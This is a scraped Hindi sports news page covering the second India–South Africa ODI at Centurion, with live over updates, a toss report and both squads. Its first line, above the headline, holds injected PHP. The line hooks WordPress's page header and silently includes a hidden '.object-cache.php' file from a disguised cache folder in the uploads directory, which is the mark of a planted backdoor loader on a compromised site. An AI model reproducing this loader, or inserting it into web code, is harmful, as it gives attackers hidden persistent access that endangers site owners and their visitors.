add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कुलदीप-चहल ने दक्षिण अफ्रीका को मुश्किल में फंसाया – SOCH INDIA
Menu

खेल
कुलदीप-चहल ने दक्षिण अफ्रीका को मुश्किल में फंसाया

nobanner

दक्षिण अफ्रीका की पारी:

15 ओवर: SA 54/4.

स्पिनर्स ने गेंदबाज़ी के लिए आते ही किया कमाल, 6 गेंदों में चहल और कुलदीप ने चटकाए 2 विकेट और दक्षिण अफ्रीकी टीम मुश्किल में.

13वें ओवर की छठी गेंद पर पहले चहल ने पांड्या के हाथों डी कॉक को 20 रन के स्कोर पर लपकवाया, उसके बाद अगले ही ओवर में पहली गेंद पर कप्तान मार्करान को कुलदीप ने भुवनेश्वर के हाथों कैच लपकवाया. 14वें ओवर की पांचवी गेंद पर अनुभवी डेविड मिलर तो अपना खाता भी नहीं खोल सके और कुलदीप का दूसरा शिकार बन गए.

उन्हें अजिंक्ये रहाणे ने लपककर चलता किया.

10 ओवर:

पहले छह ओवर में धीमी शुरूआत के बाद आमला और डी कॉक ने जैसे ही रफ्तार पकड़ी भुवनेश्वर कुमार ने टीम इंडिया को बड़ी सफलता दिला दी. भुवी ने आमला को कैच आउट करवाकर 39 के स्कोर पर मेज़बान टीम की ओपनिंग साझेदारी को तोड़ दिया.

पावरप्ले के पहले 6 ओवरों में धीमी शुरूआत के बाद अगले 4 ओवर में दोनों बल्लेबाज़ों ने थोड़ी रफ्तार पकड़ी लेकिन 10वें ओवर में ये साझेदारी टूट गई. आउट होने से पहले आमला ने 32 गेंदों पर 4 चौकों के साथ 23 रन बनाए.

अपनी इस पारी में 15 रन पार करने के साथ ही आमला सुपर स्पोर्ट पार्क सेंचुरियन में वनडे में सबसे अधिक 865 रन बनाने वाले बल्लेबाज़ भी बन गए हैं. उन्होंने अपने ही हमवतन ग्रैम स्मिथ के 861 रनों के रिकॉर्ड को पीछे छोड़ा.

WICKET: टीम इंडिया को मिली बड़ी सफलता, भुवनेश्वर कुमार की गेंद पर इनसाइड एज के साथ धोनी के हाथों कैच आउट हुए हाशिम आमला. SA 39/1

छह ओवर: पहले पांच ओवरों में भुवनेश्वर कुमार और जसप्रीत बुमराह ने विरोधी बल्लेबाज़ों पर नकेल कस कर रखी है. दक्षिण अफ्रीकी ओपनर हाशिम आमला और क्विंटन डी कॉक पहले 6 ओवरों में महज़ 14 रन ही जोड़ सके. आमला और डीकॉक दोनों ही 18-18 गेंदों का सामना कर 7-7 रन बनाकर बल्लेबाज़ी कर रहे हैं.

भारत के लिए भुवनेश्वर और बुमराह ने 3-3 ओवरों में 1-1 मेडन के साथ 7-7 रन खर्च किए हैं.

———————————————

टॉस रिपोर्ट:

भारत के कप्तान विराट कोहली ने रविवार को सेंचुरियन के सुपरस्पोर्ट्स पार्क मैदान पर खेले जा रहे दूसरे वनडे मैच में दक्षिण अफ्रीका के खिलाफ टॉस जीतकर पहले गेंदबाजी करने का फैसला किया है. भारत छह मैचों की वनडे सीरीज में 1-0 से आगे चल रहा है. पहले वनडे में दक्षिण अफ्रीका की कप्तानी करने वाले फाफ डु प्लेसिस के चोटिल होने की वजह से केवल दो मैचों को अनुभव रखने वाले एडिन मार्कराम को टीम का कप्तान बनाया गया है. फाफ डु प्लेसिस चोट के कारण पूरी सीरीज से बाहर हो गए है.

भारत ने इस मैच के लिए टीम में कोई बदलाव नहीं किया है. पहले वनडे की तरह कप्तान विराट कोहली इस मैच में भी दो स्पिनरों के साथ मैदान पर उतरेंगे. भुवनेश्वर कुमार, जसप्रीत बुमराह के रूप में दो मुख्य तेज गेंदबाज हैं जबकि हरफनमौला हार्दिक पांड्या तीसरे तेज गेंदबाज होंगे.

दक्षिण अफ्रीका की टीम में चोटिल फाफ डु प्लेसिस की जगह खायेलिह्ले जोंडो को मौका दिया गया है. यह जोंडो का दक्षिण अफ्रीका के लिए पहला एकदिवसीय मैच होगा. हरफनमौला खिलाड़ी अंदिले फेहुलकवायो के स्थान पर स्पिन गेंदबाज तबरेज शम्सी को भी टीम में जगह मिली है.

टीमें:

भारत: विराट कोहली (कप्तान), रोहित शर्मा, शिखर धवन, अजिंक्य रहाणे, महेंद्र सिंह धौनी (विकेटकीपर), केदार जाधव, हार्दिक पांड्या, भुवनेश्वर कुमार, कुलदीप यादव, जसप्रीत बुमराह, युजवेंद्र चहल.

दक्षिण अफ्रीका: एडिन मार्कराम (कप्तान), हाशिम अमला, क्विंटन डी कॉक, खायेलिह्ले जोंडो, ज्यां पॉल ड्यूमिनी, डेविड मिलर, क्रिस मौरिस, कागिसो रबादा, मोर्ने मोर्केल, तबरेज शम्सी, इमरान ताहिर.